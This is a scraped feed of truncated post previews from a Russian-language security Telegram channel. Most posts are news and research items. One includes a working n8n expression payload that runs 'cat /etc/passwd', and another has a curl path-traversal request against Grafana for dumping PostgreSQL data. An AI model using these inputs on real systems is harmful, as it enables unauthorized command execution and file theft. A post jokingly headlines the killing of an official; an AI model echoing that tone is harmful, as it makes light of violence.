Cybred

А мы и не думали Клиент Telega, который используют россияне, чтобы "обходить" блокировку Telegram, перехватывает весь трафик. Более того, существует админка, из которой можно мониторить весь флоу переписок. Технически это работает так — вместо заблокированных IP-адресов Telegram, в клиент вшит IP-адрес и публичный ключ датацентра, предположительно, от VK. Этот dc-proxy контролирует хэндшейк. Именно он договаривается с клиентом об одном ключе шифрования, а с настоящим сервером Telegram о другом к...

Red Team Infrastructure The Full Picture Это самый полный гайд в 2026 году по созданию современной, устойчивой и максимально скрытой инфраструктуры для Red Team, — начиная от покупки домена, заканчивая получением отстуков. Сегодня недостаточно просто купить VDS и поднять там C2 из коробки, — такие серверы быстро найти, а получить бан можно уже через 30 секунд после запуска. Для того, чтобы этого не случилось, надо поднять инфру, которая замаскирует тебя и твой сервер. Чем автор и поделился — в с...

Еще даже не успели присвоить CVE В telnetd начиная с версии 1.9.3 (май 2015 года) и вплоть до 2.7 (включительно) существует уязвимость, которая позволяет любому подключиться от имени root, без проверки пароля. Под ударом практически все дистрибутивы Linux, которые ставят inetutils-telnetd из репозиториев: — Debian / Ubuntu / Kali / Trisquel и производные — Многие embedded-системы, старые роутеры, IoT-устройства, промышленные контроллеры, где до сих пор жив telnet Shodan сейчас находит 732,350 ус...

Выложили доклады с конференции DEF CON 33. Она прошла в Лас-Вегасе и оказалась одной из самых крупных DEF CON за всю историю — конференцию посетили около 26 000 человек, а на YouTube уже опубликовано более 350(!) видео. Среди них много докладов на самые разные темы — от классического веба и hardware-хакинга (и куда же без AI) до совсем неожиданных направлений: гайда по отмыванию средств с помощью криптовалюты, современного подхода к кардингу и взлома физических замков в отелях. Один из участнико...

Это Кира, только без тетради Прямо в проходной здания Роскомнадзора в Москве убит высокопоставленный сотрудник ведомства Алексей Беляев — он отвечал за блокировки сайтов и замедление трафика. Убийство произошло 19 января: 16-летний школьник Артём ударил чиновника ножом в грудь, когда тот выходил из офиса. Беляев работал в Роскомнадзоре больше 10 лет, на момент смерти — замначальника отдела контроля и надзора в сфере связи. Этот отдел отвечает за: — установку и контроль «чёрных ящиков» (ТСПУ), че...

Надо было пользоваться гарантом Сын Павла Дурова, Миша, решил по-своему отметить день безопасного интернета — заскамил трёх человек в телеге, среди которых был и админ одного из каналов. Все началось с того, что 16-летний Миша написал первым и предложил купить у него подарок "Кепку Дурова", мол, она ему больше не нужна. В качестве пруфов показал фотку с Хабибом, прислал кружок, где сидит рядом с основателем Telegram, и отправил пару голосовых, в которых уверял, что он не скамер: Брат, да если мо...

🔥 [10/10] CVE-2026-25049: RCE в n8n Это обход для всех предыдущих патчей. Уязвимость позволяет выполнять произвольные команды на сервере. Уязвимы версии: — <1.123.17 (исправлено в 1.123.17) — <2.5.2 (исправлено в 2.5.2) PoC 1. Создаем workflow 2. Добавляем Edit Field 3. Указываем в String (Expression) {{(() => { const { [constr&#036;{'uct'}or]: Fn } = Object; const payload = "return process.mainModule.require('child_process').execSync('cat /etc/passwd').toString();"; return Fn(payload)(); })()}...

Как не потерять все Есть железная схема с тремя копиями: 1. Рабочая (которую используешь каждый день) 2. Локальная (чтобы быстро восстановиться) 3. Удалённая (если сгорела хата) Хранишь все свои данные на ПК, синкаешь самое важное с NAS или просто внешним диском, и отдельно выгружаешь в облако. Но какое облако выбрать? В таблице собраны все облачные хранилища, у которых есть lifetime-подписка — один раз платишь и получаешь доступ на всю жизнь. У каждого есть свои нюансы, — один говорит о "пожизн...

https://github.com/bytewreck/DumpGuard На последних версиях Windows, mimikatz становится бесполезным, когда ты пытаешься сдампить LSASS. Это происходит, так как в LSASS ничего ценного больше не остается, ведь все секреты хранятся в отдельном защищённом процессе lsaiso.exe — этот механизм защиты называется Credential Guard, и он включен по умолчанию, начиная с с 22H2 / Server 2025. Эта утилита позволяет "обойти" его с помощью Remote Credential Guard, который обычно используется при RDP-сессиях, ч...

Дампим PostgreSQL с помощью Path Traversal Наткнулся на гайд то, как восстановить "убитую" базу данных PostgreSQL. Его суть сводится к тому, что все данные лежат на файловой системе, и все можно довольно легко раскрутить от главного файла global/1262 (pg_database). Его идентификатор (oid) всегда статический, и это удобно — можно легко достать с помощью Path Traversal. Вот так, на примере CVE-2021-43798 в Grafana: curl --path-as-is -O http://127.0.0.1:3000/public/plugins/alertlist/../../../../../...